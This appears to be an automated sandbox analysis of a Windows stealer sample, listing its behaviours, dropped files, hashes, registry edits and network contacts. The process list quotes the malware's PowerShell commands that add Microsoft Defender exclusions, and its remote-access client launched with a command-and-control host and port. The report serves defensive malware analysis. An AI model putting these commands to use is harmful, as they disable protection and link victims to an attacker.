Analysis Overview
SHA256
a01977e758a85dc01fb8ca7da9110adfe5bf9b9bec0af1db82741fe83d20408d
Threat Level: Known bad
The file switched_1.exe was found to be: Known bad.
Malicious Activity Summary
IcarusStealer
Modifies Installed Components in the registry
Executes dropped EXE
Loads dropped DLL
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Enumerates physical storage devices
Unsigned PE
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Modifies registry class
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Modifies system certificate store
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-03-08 01:45
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-08 01:45
Reported
2024-03-08 01:48
Platform
win7-20240221-en
Max time kernel
127s
Max time network
120s
Command Line
Signatures
IcarusStealer
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\switched_1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\switched_1.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2584 set thread context of 2464 | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\switched_1.exe
"C:\Users\Admin\AppData\Local\Temp\switched_1.exe"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wfnlbhfv\wfnlbhfv.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1B7C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8613C2DBF67B414E8A463426924CF2C1.TMP"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.205:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | case-shield.gl.at.ply.gg | udp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| GB | 2.19.169.32:80 | x2.c.lencr.org | tcp |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| N/A | 127.0.0.1:49205 | tcp | |
| N/A | 127.0.0.1:49207 | tcp | |
| N/A | 127.0.0.1:49264 | tcp | |
| N/A | 127.0.0.1:49266 | tcp |
Files
\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | 93d03553eea24aba513c5ebd4432644d |
| SHA1 | 6f7f0b651a7c0e2775cb161edf10b0459e172a9f |
| SHA256 | 23e9fa0b264edcf4ecae8b0753752a529a03515fecec3b9502d3dbe40f773065 |
| SHA512 | 032b9baa882bcfc4c4dd66fda52d083e6b69ee56f02bc5b9f1af74d7ae206d8e2656874e01ab71ee7ad178afb304e8924d9e43b948ee722db7e6d27e679dae4c |
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | beecd7735af8503be2d5abdd0a1639a7 |
| SHA1 | 93e53ce680eaa4cd54a9dfbd65cbe5abc3174d5b |
| SHA256 | e9c02b026697752d8fa535c5586bd7f4abaa899b5e5e2ec7840b8bfae38722b7 |
| SHA512 | bc3787b31e6d8dc600245eee203256b9ca9800f21fab41f7d30542740728bb59218abe5e6ec3ec8469c855c0a963790f638ea2e2694024f4d57de3306a4070a0 |
memory/2660-7-0x00000000035A0000-0x00000000039DC000-memory.dmp
\Users\Admin\AppData\Local\Temp\tesetey.exe
| MD5 | 0f0838bc6642dd6bc603368e50b4aba3 |
| SHA1 | 932bd4d1c11996bf8ac3ac74a94b266e96d44c36 |
| SHA256 | 4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9 |
| SHA512 | a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860 |
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | e1f9a012841d02b6b01843c5c84a09f8 |
| SHA1 | 857b63a05ba1b02d129eeb91efa7e3d8a6475958 |
| SHA256 | 364a5b9255a40c5a8ba431d79abf37df8b278621f67fde99e054e16453d0cef7 |
| SHA512 | 7571a3462239f31e206d652f69ae3edd89219023196bff7d55bb76217d2dfcb3b1e77061f4c0a4f9ab392ec3d6a2f778467128d7d0dcc26e76b1578d8b5d0c44 |
memory/2964-12-0x000000013F760000-0x000000013FB9C000-memory.dmp
memory/2584-15-0x00000000011D0000-0x0000000001252000-memory.dmp
memory/2584-16-0x00000000741D0000-0x00000000748BE000-memory.dmp
memory/2584-17-0x0000000000D80000-0x0000000000DC0000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\wfnlbhfv\wfnlbhfv.0.cs
| MD5 | 14846c9faaef9299a1bf17730f20e4e6 |
| SHA1 | 8083da995cfaa0e8e469780e32fcff1747850eb6 |
| SHA256 | 61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b |
| SHA512 | 549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1 |
\??\c:\Users\Admin\AppData\Local\Temp\wfnlbhfv\wfnlbhfv.cmdline
| MD5 | cb9c6bc36d404c58941fbaaafbec7eb6 |
| SHA1 | 8138f58b9f3e2b304e8ef6b24f9c43447e1fcc26 |
| SHA256 | d342d9f407faa217db5dbb348bf947d91a5f073427884e4230e62d0c2eded14f |
| SHA512 | 4cd91754cf19da7795fc5b72c5e2757f6f54378c1b9731185c14f4948ae56e2c0f8b2d0b451bd857990b6b25e05f585dc47cac81ba55686fec80d28cd5ceaf7b |
memory/2464-36-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/2464-35-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2464-41-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2464-39-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2464-37-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2464-34-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2464-42-0x00000000741D0000-0x00000000748BE000-memory.dmp
memory/2464-32-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2464-43-0x0000000000340000-0x0000000000380000-memory.dmp
memory/2464-30-0x0000000000400000-0x0000000000424000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RES1B7C.tmp
| MD5 | b1ae4127bcb50359b0edcc52e0025e95 |
| SHA1 | f87259f40ae67a73f2dee61851f89c153ba7113f |
| SHA256 | 1a067edecd3154053c742ed3cf341934a27f06f1918c3ac4011c4b6bc42f3b56 |
| SHA512 | 4a1731ef205fae7545c126ca0b86654f531a52ca4a192ec3655b19f68a91ccaf0fd500306624b1525110777e48653d40fc9eecf636cc805f8f493c9aa586b805 |
\??\c:\Users\Admin\AppData\Local\Temp\CSC8613C2DBF67B414E8A463426924CF2C1.TMP
| MD5 | e9144225655a1177485a6238f397718e |
| SHA1 | 0618d989814312c38b8005fc469222f891470642 |
| SHA256 | f2ff3d3919bf3120bd18978b0225c56b53eec3a645493f7fe08344671cacb21d |
| SHA512 | 392b9684bc1c0d054a397bb8ed54bc682a59ea6c1c12abad5d70ec2f0065afec4645cae8c2672ec4571d5763397092388b944cd5c7582a4aa685ecd4e3a0c2a4 |
memory/1724-49-0x000000006EFD0000-0x000000006F57B000-memory.dmp
memory/1924-52-0x00000000004B0000-0x00000000004F0000-memory.dmp
memory/1724-51-0x0000000002A90000-0x0000000002AD0000-memory.dmp
memory/1724-53-0x000000006EFD0000-0x000000006F57B000-memory.dmp
memory/1924-50-0x000000006EFD0000-0x000000006F57B000-memory.dmp
memory/1924-54-0x000000006EFD0000-0x000000006F57B000-memory.dmp
memory/1924-56-0x00000000004B0000-0x00000000004F0000-memory.dmp
memory/1724-55-0x0000000002A90000-0x0000000002AD0000-memory.dmp
memory/1724-57-0x0000000002A90000-0x0000000002AD0000-memory.dmp
memory/1724-59-0x000000006EFD0000-0x000000006F57B000-memory.dmp
memory/1924-58-0x000000006EFD0000-0x000000006F57B000-memory.dmp
memory/2584-62-0x00000000741D0000-0x00000000748BE000-memory.dmp
memory/2964-63-0x000000013F760000-0x000000013FB9C000-memory.dmp
memory/2400-64-0x0000000004240000-0x0000000004241000-memory.dmp
memory/2660-65-0x00000000035A0000-0x00000000039DC000-memory.dmp
memory/2464-66-0x00000000741D0000-0x00000000748BE000-memory.dmp
memory/2464-67-0x0000000000340000-0x0000000000380000-memory.dmp
memory/2400-68-0x0000000004240000-0x0000000004241000-memory.dmp
memory/2400-72-0x0000000002A70000-0x0000000002A80000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-08 01:45
Reported
2024-03-08 01:45
Platform
win10v2004-20240226-en
Max time kernel
13s
Max time network
20s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\switched_1.exe
"C:\Users\Admin\AppData\Local\Temp\switched_1.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp |